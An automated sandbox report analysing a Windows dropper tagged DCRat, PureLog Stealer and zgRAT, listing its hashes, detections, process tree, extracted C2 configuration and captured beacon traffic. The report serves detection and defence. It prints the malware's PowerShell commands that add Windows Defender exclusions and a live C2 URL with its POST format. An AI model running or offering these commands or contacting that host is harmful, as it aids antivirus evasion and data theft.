Windows Analysis Report
QH67JSdZWl.exe

Overview

General Information

Sample name:QH67JSdZWl.exe
renamed because original name is a hash value
Original sample name:c8228b107dfad48c1a7de8147fa1f6e4.exe
Analysis ID:1582993
MD5:c8228b107dfad48c1a7de8147fa1f6e4
SHA1:7f6d1d3c48d891cccc4b0dd57504db216ac681a8
SHA256:8d0c8954abeaa3c75c922544e9798171de09868a3a1f9300e07465672ada3da4
Tags:DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QH67JSdZWl.exe (PID: 1620 cmdline: "C:\Users\user\Desktop\QH67JSdZWl.exe" MD5: C8228B107DFAD48C1A7DE8147FA1F6E4)
    • f5Mb10zb.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" MD5: FEB773E3FB046E0D1F39450C703492CA)
      • wscript.exe (PID: 6288 cmdline: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • agentFont.exe (PID: 2120 cmdline: "C:\mshypercomponentSavesdll/agentFont.exe" MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
            • powershell.exe (PID: 7284 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7292 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 8172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 7328 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7352 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7940 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 8064 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • agentFont.exe (PID: 1136 cmdline: "C:\mshypercomponentSavesdll\agentFont.exe" MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • agentFont.exe (PID: 7696 cmdline: C:\mshypercomponentSavesdll\agentFont.exe MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • agentFont.exe (PID: 7832 cmdline: C:\mshypercomponentSavesdll\agentFont.exe MD5: 0D30B2D3FD8DB7AE5EDC0455DA8DC8E9)
  • cleanup
{"C2 url": "http://487997cm.renyash.top/VideoFlowergeneratorTestpublic", "MUTEX": "DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS"}
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Recovery\ApplicationFrameHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\ApplicationFrameHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\mshypercomponentSavesdll\agentFont.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
5.0.agentFont.exe.f30000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.0.agentFont.exe.f30000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
1.3.f5Mb10zb.exe.65e7104.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
1.3.f5Mb10zb.exe.65e7104.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
1.3.f5Mb10zb.exe.65e7104.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                System Summary

                                Source: File created Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\mshypercomponentSavesdll\agentFont.exe, ProcessId: 2120, TargetFilename: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\mshypercomponentSavesdll/agentFont.exe", ParentImage: C:\mshypercomponentSavesdll\agentFont.exe, ParentProcessId: 2120, ParentProcessName: agentFont.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', ProcessId: 7284, ProcessName: powershell.exe
                                Source: Process started Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, ParentProcessId: 3064, ParentProcessName: f5Mb10zb.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" , ProcessId: 6288, ProcessName: wscript.exe
                                Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\mshypercomponentSavesdll/agentFont.exe", ParentImage: C:\mshypercomponentSavesdll\agentFont.exe, ParentProcessId: 2120, ParentProcessName: agentFont.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe', ProcessId: 7284, ProcessName: powershell.exe
                                No Suricata rule has matched

                                AV Detection

                                Source: http://487997cm.renyash.top/VideoFlowergeneratorTestpublic.php Avira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat Avira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Avira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\Recovery\ApplicationFrameHost.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                                Source: C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe Avira: detection malicious, Label: VBS/Runner.VPG
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"C2 url": "http://487997cm.renyash.top/VideoFlowergeneratorTestpublic", "MUTEX": "DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS"}
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe ReversingLabs: Detection: 82%
                                Source: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe ReversingLabs: Detection: 82%
                                Source: C:\Recovery\ApplicationFrameHost.exe ReversingLabs: Detection: 82%
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe ReversingLabs: Detection: 82%
                                Source: C:\Users\user\Desktop\HOfmkikL.log ReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\HhjUFBqv.log ReversingLabs: Detection: 25%
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe ReversingLabs: Detection: 82%
                                Source: C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe ReversingLabs: Detection: 82%
                                Source: C:\mshypercomponentSavesdll\agentFont.exe ReversingLabs: Detection: 82%
                                Source: QH67JSdZWl.exe Virustotal: Detection: 44%
                                Source: QH67JSdZWl.exe ReversingLabs: Detection: 60%
                                Source: C:\Users\user\Desktop\cvxIvGPF.log Joe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Joe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\kZFyeAfm.log Joe Sandbox ML: detected
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Joe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\AnJfWYZZ.log Joe Sandbox ML: detected
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe Joe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe Joe Sandbox ML: detected
                                Source: C:\Recovery\ApplicationFrameHost.exe Joe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\rEqPmwUs.log Joe Sandbox ML: detected
                                Source: QH67JSdZWl.exe Joe Sandbox ML: detected
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp String decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"}}
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-zJ96YeHxtQ4bDVXj3fVS","0","hidraceflal","1","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp String decryptor: [["http://487997cm.renyash.top/","VideoFlowergeneratorTestpublic"]]
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\9e8d7a4ca61bd9
                                Source: QH67JSdZWl.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000000.1667497208.0000000000753000.00000002.00000001.01000000.00000009.sdmp, f5Mb10zb.exe, 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe, 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, f5Mb10zb.exe.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: QH67JSdZWl.exe, 00000000.00000003.1663870017.0000025FF5C0E000.00000004.00000020.00020000.00000000.sdmp, mf04Loader.dll.0.dr
                                Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: QH67JSdZWl.exe
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F0341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F0341C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Code function: 0_2_00007FF7B8F2EBC0 FindFirstFileExA,0_2_00007FF7B8F2EBC0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Code function: 1_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0073C220
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\AppData\Local\Temp\RarSFX0\
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\AppData\Local\Temp\
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\AppData\Local\
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\AppData\
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File opened: C:\Users\user\

                                Software Vulnerabilities

                                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox View ASN Name: PREVIDER-ASNL PREVIDER-ASNL
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 384 Expect: 100-continue
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 1044 Expect: 100-continue
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 1340 Expect: 100-continue
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 1340 Expect: 100-continue Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 487997cm.renyash.top Content-Length: 1324 Expect: 100-continue Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1340
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1040
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1312
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1040
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 487997cm.renyash.top
Content-Length: 1032
Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /VideoFlowergeneratorTestpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 487997cm.renyash.topContent-Length: 1040Expect: 100-continueConnection: Keep-Alive
